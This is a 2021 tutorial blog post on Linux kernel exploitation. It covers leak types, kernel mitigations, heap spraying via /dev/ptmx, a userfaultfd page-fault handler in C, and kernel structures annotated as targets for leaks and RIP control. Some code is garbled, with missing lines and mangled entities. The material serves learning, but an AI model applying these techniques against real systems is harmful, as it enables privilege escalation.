Small steps into kernel exploitation

June 23, 2021 // echel0n

One small step for the world, one giant leap for the vulnerability researcher


When someone figures out how to take advantage of a bug, it becomes a security issue. If you are the person that found a bug in the kernel land but trying to figure out what to do next, this post may help you in the way.

From "Stairway to succesful kernel exploitation, by Enrico Perla, Massimiliano Oldani"; To develop a good exploit, we must understand the vulnerability we are targeting, the kernel subsystems involved and the techniques we are using.

First things first, a good exploit is a good exploit when it is;
* Reliable
* Safe
* Effective

* It must be narrowed down, as much as possible, the list of preconditions which must be met for the exploit to work.
* The part of the exploit might crash the machine, must be identified.
* Exploit must leave the machine in a stable state.
* It is not a must but exploit should be portable, which means it should work on as many targets
as possible.

So get back to subject. In a security view, the question is "what kind of advantages we are looking for?"

Identifying Advantages

We are looking for;
* Memory leaks
* Stack addresses/values
* Heap addresses/values
* Kernel data segment
* Arbitrary Read/Write
* RIP Control

Stack Leak

* Stack addresses/values are very useful type of leak because there may not be any other way to know where the stack is. If it is enough sufficient leak, it would reveal the a canary protection and its values. Since the kernel stack is allocated one and forever, this leak is very powerful.

Heap Leak
* The generic case of heap leak is the ability to leak memory around an object, either before after. This leak may expose information about the state of the previous/next object.

Kernel Data Segment Leak
* The data segment of the kernel is created at compilation time. If any leak occurs in this segment, you may expose the value of some kernel configuration or retrieve some kernel symbols. Even if you couldn't do that, you will be given a precise offset to use in another steps in your exploit code. Although the leak from here is convenient, it is not the only information that will make your exploit reliable. It will help you in triggering steps of your exploit but not in earlier stages.

Arbitrary Write
* We need to be able to transfer our intention as much as we get information from the kernel land. With gathered information from leaks, we need to push some data into kernel land with intention of make kernel do something unintended. To do so, we need to find a memory area which is in our control. In most cases, we might be limited in the amount of space we can use, so be careful about the size of your payload and be sure about where it will land to. Arbitrary read/write can occur in these example scenerios;

* Buffer copy without checking size of input (Buffer overflow)
* Buffer Underflow
* Write-what-where condition
* Incorrect calculation of buffer size
* Access of memory location before start/after end of buffer
* Buffer access with incorrect length value
* Free of memory not on the Heap
* Double free
* Use after free
* Race conditions

Kernel Mitigations

Also worth to mention now, when you are trying to get advantages from a bug, you will be restricted with linux kernel mitigation features as like in userland mitigations. A few of them are;

* Kernel stack cookies: Exactly the same as stack canaries on userland.
* Kernel address space layout randomization (KASLR): Also like ASLR on userland.
It randomizes the base address each time system is booted.
* Supervisor mode execution proection (SMEP): This feature marks all the userland pages
in the page table as NX when the process in kernel land.
* Supervisor mode access prevention(SMAP): This feature marks all the userland pages in the
page table as non accessible when the process in kernel land.
* (KPTI): With this feature, kernel separates user land and kernel land page tables entirely.
User land page table contains a minimal set of kernel land addresses, minimize the surface.

Heap Spraying (how/why)

As it is noted, we need reliability and often times it depends on memory sequences and aligments. Aligments of memory and the state of a operating system introduce a lot of randomness when we are dealing with a bug. The common way to deal with this chaos, is putting a lot of NOP's or allocate a lot of memory. Allocating a large amount of memory is called heap spraying. A heap spray can be used to compsensate for this chaos and can increase the chances of succesful exploitation. Also the start location of a large heap allocation is more predictable and consecutive allocations are approximately sequential. This means that the sprayed heap will be in the same location every time the heap spray is run.

  1. // Simple heap spraying example;
  2. for(int i= 0; i < 0x100; ++i)
  3. ptmx[i] = open("/dev/ptmx", ORDWR | O_NOCTTY); // reserve tty_struct
  4. for(int i= 0; i < 0x100; ++i)
  5. close(ptmx[i]);

Depending on which mitigations are enabled and the vulnerable driver functions available, getting an advantage from a bug is changing. Let's say you have found a bug that causes "Use After Free" but the size of you can allocate is fixed. Then you will need to find "usable" objects with the matching size of your allocation size from kernel. Before finding objects that are usable, let's take a look at which conditions can be ideal, explained by Vitaly Nikolenko in "Linux Kernel universal heap spray" blog.

Ideal conditions for universal heap spray
  1. Object size is controlled by the user.
  2. No restrictions even for very small objects (kmalloc-8)
  3. Object content is controlled by the user.
  4. No uncontrolled header at the beginning of the object.
  5. The target object should "stay" in the kernel during the exploitation stage.

For the first and second conditions, we need kmalloc-> kfree execution paths to achieve that control of an object state. For example, setxattr is a way to do that. For the last ideal condition, we need to hold that object in the memory while our code is running. One example way to hold that object is userfaultfd.

userfaultfd usage idea is basically handling page faults in user space. For example, any meaningless read/write access to wrong mmap() allocation will trigger page fault handler in kernel space. With userfaultfd, these faults can be processed in user space by a seperate thread.

The only problem in this approach is that main user-space execution is suspended as well when page fault is handled in a seperate thread. No worries, this can be solved by forking another process or with a second thread.

  1. //Here is an example how you can setup a page handler;
  2. #define ulong unsigned long
  3. #define errexit(msg) \
  4. do { \
  5. perror(msg); \
  6. exit(EXIT_FAILURE); \
  7. } while (0)
  8. void *fault_handler_thread(void *arg) {
  9. //
  10. ulong value;
  11. struct uffd_msg msg;
  12. long uffd;
  13. static char *page = NULL;
  14. struct uffdio_copy copy;
  15. int len, i, page_size = sysconf(_SC_PAGE_SIZE);
  16. if (page == NULL) {
  17. page = mmap(NULL, page_size, PROT_READ | PROT_WRITE,
  19. if (page == MAP_FAILED)
  20. errexit("mmap (userfaultfd)");
  21. }
  22. uffd = (long)arg;
  23. for (;;) {
  24. struct pollfd polfd;
  25. polfd.fd = uffd;
  26. polfd.event = POLLIN;
  27. // is it in good state?
  28. len = poll(& polfd, 1, -1);
  29. if (len == -1)
  30. errexit("poll");
  31. printf("[+] fault_handler_thread():\n");
  32. printf("poll() returns: nready = %d; "
  33. "POLLIN = %d; POLLERR = %d\n",
  34. len, (pollfd.revents & amp; POLLIN) != 0,
  35. (pollfd.revents & amp; POLLERR) != 0);
  36. len = read(uffd, & msg, sizeof(msg));
  37. if (len == 0)
  38. errexit("userfaultfd EOF");
  39. if (len == -1)
  40. errexit("read");
  41. if (msg.event != UFFD_EVENT_PAGEFAULT)
  42. errexit("msg.event");
  43. printf("[+] UFFD_EVENT_PAGEFAULT event: \n");
  44. printf(" flags = 0x%lx\n", msg.arg.pagefault.flags);
  45. printf(" address = 0x%lx\n", msg.arg.pagefault.address);
  46. //
  47. uffdio_copy.src = (unsigned long)page;
  48. uffdio_copy.dst = (unsigned long)msg.arg.pagefault.address & amp;
  49. ~(page_size - 1);
  50. uffdio_copy.len = page_size;
  51. uffdio_copy.mode = 0;
  52. uffdio_copy.copy = 0;
  53. if (ioctl(uffd, UFFDIO_COPY, & uffdio_copy) == -1)
  54. errexit("ioctl: UFFDIO_COPY");
  55. printf("[+] uffdio_copy.copy = %ld\n", uffdio_copy.copy);
  56. }
  57. }
  1. // Then create like this
  2. void setup_pagefault(void *addr, unsigned size) {
  3. long uffd;
  4. pthread_t th;
  5. struct uffdio_api api;
  6. struct uffdio_register reg;
  7. int s;
  8. // new userfaulfd
  9. page_size = sysconf(_SC_PAGE_SIZE);
  10. uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
  11. if (uffd == -1)
  12. errexit("userfaultfd");
  13. // enabled uffd object
  14. api.api = UFFD_API;
  15. api.features = 0;
  16. if (ioctl(uffd, UFFDIO_API, &api) == -1)
  17. errexit("ioctl: UFFDIO_API");
  18. // register memory address
  19. reg.range.start = (unsigned long)addr;
  20. reg.range.len = size;
  22. if (ioctl(uffd, UFFDIO_REGISTER, ®) == -1)
  23. errexit("ioctl: UFFDIO_REGITER");
  24. // monitor page fault
  25. s = pthread_create(&th, NULL, fault_handler_thread, (void *)uffd);
  26. if (s != 0)
  27. errexit("pthread_create");
  28. }
  1. // call part
  2. int main(void) {
  3. // Allocate memory for userfaultfd
  4. void *pages = (void *)mmap((void *)0x77770000, 0x4000, PROT_READ | PROT_WRITE,
  6. if ((unsigned long)pages != 0x77770000)
  7. errexit("mmap (0x77770000)");
  8. setup_pagefault(pages, 0x4000);
  9. }
Useful Kernel Objects

As mentioned earlier, if the size of memory that you can allocate is fixed, then you will need to find "usable" objects with the matching size of your allocation size from kernel. Below you will find some usable(according to your needs) objects that ptr-yudai found and explained briefly. (the original blog post link is at bottom of the page)

(ptr-yudai's list is very informative and well explained in his blog but I would like to expand it if there are new structures that can be useful. The problem is I am not eligible enough to search for these things for now. I will study it and i will look for what I can do. Starting here, it is just translated from ptr-yudai's blog and referenced by linux source code. I will work on those later.)

List of structures that can be used for (Leak / Arbitrary Read|Write /RIP Control);

  1. -
  2. - shm_file_data
  3. - seq_operations
  4. - msg_msg (+ user-supplied data)
  5. - subprocess_info
  6. - cred
  7. - file
  8. - timerfd_ctx
  9. - tty_struct

Structures that can be used for arbitrary write / heap spraying;

  1. -
  2. - msg_msg
  3. - setxattr
  4. - sendmsg
Defined in shm.c
  1. struct shm_file_data {
  2. int id;
  3. struct ipc_namespace *ns;
  4. struct file *file;
  5. const struct vm_operations_struct *vm_ops;
  6. };

Size: 0x20 (kmalloc-32)
Base: *ns and *vm_ops point to kernel data area, leak is possible.
Heap: Can leak because *file points to the heap area.
RIP Control: No.
Allocation: map shared memory with shmat

Defined in seq_file.h
  1. struct seq_operations {
  2. void * (*start) (struct seq_file *m, loff_t *pos);
  3. void (*stop) (struct seq_file *m, void *v);
  4. void * (*next) (struct seq_file *m, void *v, loff_t *pos);
  5. int (*show) (struct seq_file *m, void *v);
  6. };

Size: 0x20 (kmalloc-32)
Base: Can leak 4 function pointers
Heap: No
Stack: No
RIP: Possible
Allocation: Opening a file that uses single_open (ex: /proc/self/stat)
Release: Close that file

Defined in msg.h
  1. struct msg_msg {
  2. struct list_head m_list;
  3. long m_type;
  4. size_t m_ts; /* message text size */
  5. struct msg_msgseg *next;
  6. void *security;
  7. /* the actual message follows immediately */
  8. };

Size: Various (0x31 to 0x1000 / kmalloc-64 and above)
Base: No
Heap: Can leak because struct msg_msgeg *next points to previously sent message.
Stack: No


Defined in umh.h
  1. struct subprocess_info {
  2. struct work_struct work;
  3. struct completion *complete;
  4. const char *path;
  5. char **argv;
  6. char **envp;
  7. struct file *file;
  8. int wait;
  9. int retval;
  10. pid_t pid;
  11. int (*init)(struct subprocess_info *info, struct cred *new);
  12. void (*cleanup)(struct subprocess_info *info);
  13. void *data;
  14. } __randomize_layout;

Size: 0x60 (kmalloc-128)
Base: work.func points to call_usermodehelper_exec_work, leak is possible
Heap: Possible
Stack: No
RIP: RIP can be obtained via rewriting cleanup with race condition.

Defined in cred.h
  1. struct cred {
  2. atomic_t usage;
  4. atomic_t subscribers; /* number of processes subscribed */
  5. void *put_addr;
  6. unsigned magic;
  7. #define CRED_MAGIC 0x43736564
  8. #define CRED_MAGIC_DEAD 0x44656144
  9. #endif
  10. kuid_t uid; /* real UID of the task */
  11. kgid_t gid; /* real GID of the task */
  12. kuid_t suid; /* saved UID of the task */
  13. kgid_t sgid; /* saved GID of the task */
  14. kuid_t euid; /* effective UID of the task */
  15. kgid_t egid; /* effective GID of the task */
  16. kuid_t fsuid; /* UID for VFS ops */
  17. kgid_t fsgid; /* GID for VFS ops */
  18. unsigned securebits; /* SUID-less security management */
  19. kernel_cap_t cap_inheritable; /* caps our children can inherit */
  20. kernel_cap_t cap_permitted; /* caps we're permitted */
  21. kernel_cap_t cap_effective; /* caps we can actually use */
  22. kernel_cap_t cap_bset; /* capability bounding set */
  23. kernel_cap_t cap_ambient; /* Ambient capability set */
  24. #ifdef CONFIG_KEYS
  25. unsigned char jit_keyring; /* default keyring to attach requested
  26. * keys to */
  27. struct key __rcu *session_keyring; /* keyring inherited over fork */
  28. struct key *process_keyring; /* keyring private to this process */
  29. struct key *thread_keyring; /* keyring private to this thread */
  30. struct key *request_key_auth; /* assumed request_key authority */
  31. #endif
  32. #ifdef CONFIG_SECURITY
  33. void *security; /* subjective LSM security */
  34. #endif
  35. struct user_struct *user; /* real user ID subscription */
  36. struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
  37. struct group_info *group_info; /* supplementary groups for euid/fsgid */
  38. /* RCU deletion */
  39. union {
  40. int non_rcu; /* Can we skip RCU deletion? */
  41. struct rcu_head rcu; /* RCU deletion hook */
  42. };
  43. } __randomize_layout;

Size: 0xa8 (kmalloc-192)
Base: No
Heap: Possible through session_keyring
Stack: No

Defined in fs.h
  1. struct file {
  2. union {
  3. struct llist_node fu_llist;
  4. struct rcu_head fu_rcuhead;
  5. } f_u;
  6. struct path f_path;
  7. struct inode *f_inode; /* cached value */
  8. const struct file_operations *f_op;
  9. /*
  10. * Protects f_ep_links, f_flags.
  11. * Must not be taken from IRQ context.
  12. */
  13. spinlock_t f_lock;
  14. enum rw_hint f_write_hint;
  15. atomic_long_t f_count;
  16. unsigned int f_flags;
  17. fmode_t f_mode;
  18. struct mutex f_pos_lock;
  19. loff_t f_pos;
  20. struct fown_struct f_owner;
  21. const struct cred *f_cred;
  22. struct file_ra_state f_ra;
  23. u64 f_version;
  24. #ifdef CONFIG_SECURITY
  25. void *f_security;
  26. #endif
  27. /* needed for tty driver, and maybe others */
  28. void *private_data;
  29. #ifdef CONFIG_EPOLL
  30. /* Used by fs/eventpoll.c to link all the hooks to this file */
  31. struct list_head f_ep_links;
  32. struct list_head f_tfile_llink;
  33. #endif /* #ifdef CONFIG_EPOLL */
  34. struct address_space *f_mapping;
  35. errseq_t f_wb_err;
  36. } __randomize_layout
  37. __attribute__((aligned(4))); /* lest something weird decides that 2 is OK */

Size: (kmalloc-256)
Base: f_op points to data area of the kernel, so it's possible.
Heap: ?
Stack: ?
Allocation: Create shared memory with shmget
Release: Discard with shmctl
Note: RIP control is possible if you can rewrite F_OP and call shmctl.

Defined in timerfd.c
  1. struct timerfd_ctx {
  2. union {
  3. struct hrtimer tmr;
  4. struct alarm alarm;
  5. } t;
  6. ktime_t tintv;
  7. ktime_t moffs;
  8. wait_queue_head_t wqh;
  9. u64 ticks;
  10. int clockid;
  11. short unsigned expired;
  12. short unsigned settime_flags; /* to show in fdinfo */
  13. struct rcu_head rcu;
  14. struct list_head clist;
  15. spinlock_t cancel_lock;
  16. bool might_cancel;
  17. };

Size: (kmalloc-256)
Base: tmr.function points to timerfd_tmrproc so it's possible.
Heap: Can leak (from tmr.base)
Stack: No

Defined in tty.h
  1. struct tty_struct {
  2. int magic;
  3. struct kref kref;
  4. struct device *dev;
  5. struct tty_driver *driver;
  6. const struct tty_operations *ops;
  7. int index;
  8. /* Protects ldisc changes: Lock tty not pty */
  9. struct ld_semaphore ldisc_sem;
  10. struct tty_ldisc *ldisc;
  11. struct mutex atomic_write_lock;
  12. struct mutex legacy_mutex;
  13. struct mutex throttle_mutex;
  14. struct rw_semaphore termios_rwsem;
  15. struct mutex winsize_mutex;
  16. spinlock_t ctrl_lock;
  17. spinlock_t flow_lock;
  18. /* Termios values are protected by the termios rwsem */
  19. struct ktermios termios, termios_locked;
  20. struct termiox *termiox; /* May be NULL for unsupported */
  21. char name[64];
  22. struct pid *pgrp; /* Protected by ctrl lock */
  23. struct pid *session;
  24. unsigned long flags;
  25. int count;
  26. struct winsize winsize; /* winsize_mutex */
  27. unsigned long stopped:1, /* flow_lock */
  28. flow_stopped:1,
  29. unused:BITS_PER_LONG - 2;
  30. int hw_stopped;
  31. unsigned long ctrl_status:8, /* ctrl_lock */
  32. packet:1,
  33. unused_ctrl:BITS_PER_LONG - 9;
  34. unsigned int receive_room; /* Bytes free for queue */
  35. int flow_change;
  36. struct tty_struct *link;
  37. struct fasync_struct *fasync;
  38. wait_queue_head_t write_wait;
  39. wait_queue_head_t read_wait;
  40. struct work_struct hangup_work;
  41. void *disc_data;
  42. void *driver_data;
  43. spinlock_t files_lock; /* protects tty_files list */
  44. struct list_head tty_files;
  45. #define N_TTY_BUF_SIZE 4096
  46. int closing;
  47. unsigned char *write_buf;
  48. int write_cnt;
  49. /* If the tty has a pending do_SAK, queue it here - akpm */
  50. struct work_struct SAK_work;
  51. struct tty_port *port;
  52. } __randomize_layout;

Size: 0x2e0 (kmalloc-1024)
Base: *ops points to ptm_unix98_ops so it's possible.
Heap: Various leaks are possible
Stack: No
Allocation: Open /dev/ptmx
Release: Close /dev/ptmx
RIP: RIP can be controlled by rewriting *ops

Heap Spraying

(msg_msg: already mentioned.)


Size: Various (<=65535)
Reserve: Call with the pointer and size
Notes: Use with userfaultfd (First 48 bytes cannot be written)


Size: Various(>=2)
Reserve: Call with the pointer and size
Notes: Combine with userfaultfd


  5. Stairway to Successful Kernel Exploitation Book Chapter 3

Thank you for reading my blog! Have a nice day absolute legends!